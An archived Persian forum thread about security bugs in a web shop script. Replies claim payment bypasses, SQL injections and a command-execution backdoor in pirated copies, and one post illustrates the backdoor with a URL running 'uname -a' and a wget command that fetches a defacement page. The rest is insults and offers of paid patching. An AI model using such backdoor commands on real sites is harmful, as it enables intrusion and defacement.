PDA

توجه ! این یک نسخه آرشیو شده میباشد و در این حالت شما عکسی را مشاهده نمیکنید برای مشاهده کامل متن و عکسها بر روی لینک مقابل کلیک کنید : اسکریپت فریر کسی هست نابغه در باگ هاش باشه؟؟؟؟

مینا-صیفی
September 28th, 2013, 18:54
سلام کسی هست اسکریپت فریر 1.57 درین نسخه همه ی باگ هاشو بدونه و بلد باشه کجاست و بلد به پچ کردنش باشه و برنامه نویسی بلد باشه 100% باشه .... ایدی یاهوشو برام بزاره پیغام خصوصی کنه چند تا سوال دارم اگر کسی همه ی باگ های فریر از زاتش تا الان میدونه بگه الکی خاهشن تو پستم نظر ندن...ممنون....

mh1376
September 28th, 2013, 19:00
خواهش اینجوریه :ي
امنیتش معمولیه به شرط اینکه روش پلاگین همینجوری نریزی
منظورت از باگ خرید هست < اگه منظورت باگ خرید هست که باید بگم تمام اونهارو میشه بایپس کرد و بدون پرداخت از فریر بشه خرید کرد حتی whmcs
مگر اینکه یه پرتال درست کنی که فکر کنم تنها بانکی که اینطوری باشه سامان هست بعد بیای روی پرتال سامان اینکار رو انجام بدی

مینا-صیفی
September 28th, 2013, 19:05
لطفا جواب به پست ندید بهتره چون متوجه نشدید و نمیدونید من چی گفتم و منظورم چیه.

mh1376
September 28th, 2013, 19:15
من که جوابتو دادم !!!!!!!! گفتم مشکل امنیتی از پلاگین های فرر هست من هم برای فول پچ ۱۲۰ تومن میگیرم ۳ تا sqli هم داره تو قسمت های مختلف در ضمن اگر از سایت های اسکریپت گرفته باشی توش شل قراردادند منظور از شل هم این نیست که c99 و از اینجور چیزا توش گزاشته باشند منظور اینه توی یکی از فایل های php یه تابع قراردادند که فرمان شمارو اجرا میکنه مثلا site.ir/index.php?data=uname -a
که مثلا این وقتی ران بشه نسخه سیستم عامل سرور رو میده حالا میتونه جای ان یه کد اینطوری بزنه wget http://yoursite.com/defacepage.html که صفحه هک رو قرار بده تو سایتت وسلام

مینا-صیفی
September 28th, 2013, 19:20
دوست عزیز تیم امنیتی سایت منو امن کرده کلن .خسلی وقت پیش من مشکلی ندارم یدونه باگ هم ندارم اما واسه کار و اطلاعاتم میخام باگارو بشناسم بدونم واسه دوستم چک کنم.
چرا حالیتون نیست کسی که باگارو میشناسه سوال ازش دارم شما چرا چرت میگی.

mh1376
September 28th, 2013, 19:31
دوست عزیز تیم امنیتی سایت منو امن کرده کلن .خسلی وقت پیش من مشکلی ندارم یدونه باگ هم ندارم اما واسه کار و اطلاعاتم میخام باگارو بشناسم بدونم واسه دوستم چک کنم.
چرا حالیتون نیست کسی که باگارو میشناسه سوال ازش دارم شما چرا چرت میگی.

من که گفتم باگ هارو اصلا شما شور باگ گفتن نداری
اینقدر اسکولی یه بار نمیخونی گفتم تو فایل های پی اچ پی یه تابع هست باید اونارو پاک کنی
***** بی *****

مینا-صیفی
September 28th, 2013, 19:37
ایدی یاهوتو بدده چرت نگو اینا نمیشه صحبت کرد

vp_server
September 28th, 2013, 19:38
ایدی یاهوتو بدده چرت نگو اینا نمیشه صحبت کرد
بهتر نیست به جای توهین و به کار گیری الفاظ نادرست در انجمن عمومی به آشپزی و خانه داری مشغول شوید؟

مینا-صیفی
September 28th, 2013, 19:40
همونطور گفتم چیزی نمیدونید یا ربطی نداره پست ندید تو پسته من شما برو بخاب فردا باید بری مدرسه :))

vp_server
September 28th, 2013, 19:43
همونطور گفتم چیزی نمیدونید یا ربطی نداره پست ندید تو پسته من شما برو بخاب فردا باید بری مدرسه :))
شما هنوز حتی توانایی درست نوشتن را ندارید!
در هر خط از پست های شما چندین اشتباه املایی است
پس حرف از سواد و مدرسه نزنید :)!

مینا-صیفی
September 28th, 2013, 19:47
اره راست میگید چون فارسی نمیتونم بنویسم انگلیش میتونم فقط.

rezaonline.net
September 28th, 2013, 19:51
آقای(؟!) صیفی شما چقد غلط املایی دارید

برو بخاب
بخواب

سایت منو امن کرده کلن
کلاً

میخام باگارو بشناسم
میخوام ، باگها

فریر از زاتش تا الان میدونه بگه الکی خاهشن تو پستم نظر ندن...ممنون....
ذات
خواهشاً
:)

من برنامه نویسم اگر تمایل دارید ، اسکریپت رو زیپ کنید و تحویل بدید تا باگها رو در بیارم براتون .
هزینه بررسی هر 1000 خط کد نویسی ، 30 هزار تومن هست .
دیگه نمیدونم اسکریپتتون چند خط کد داره .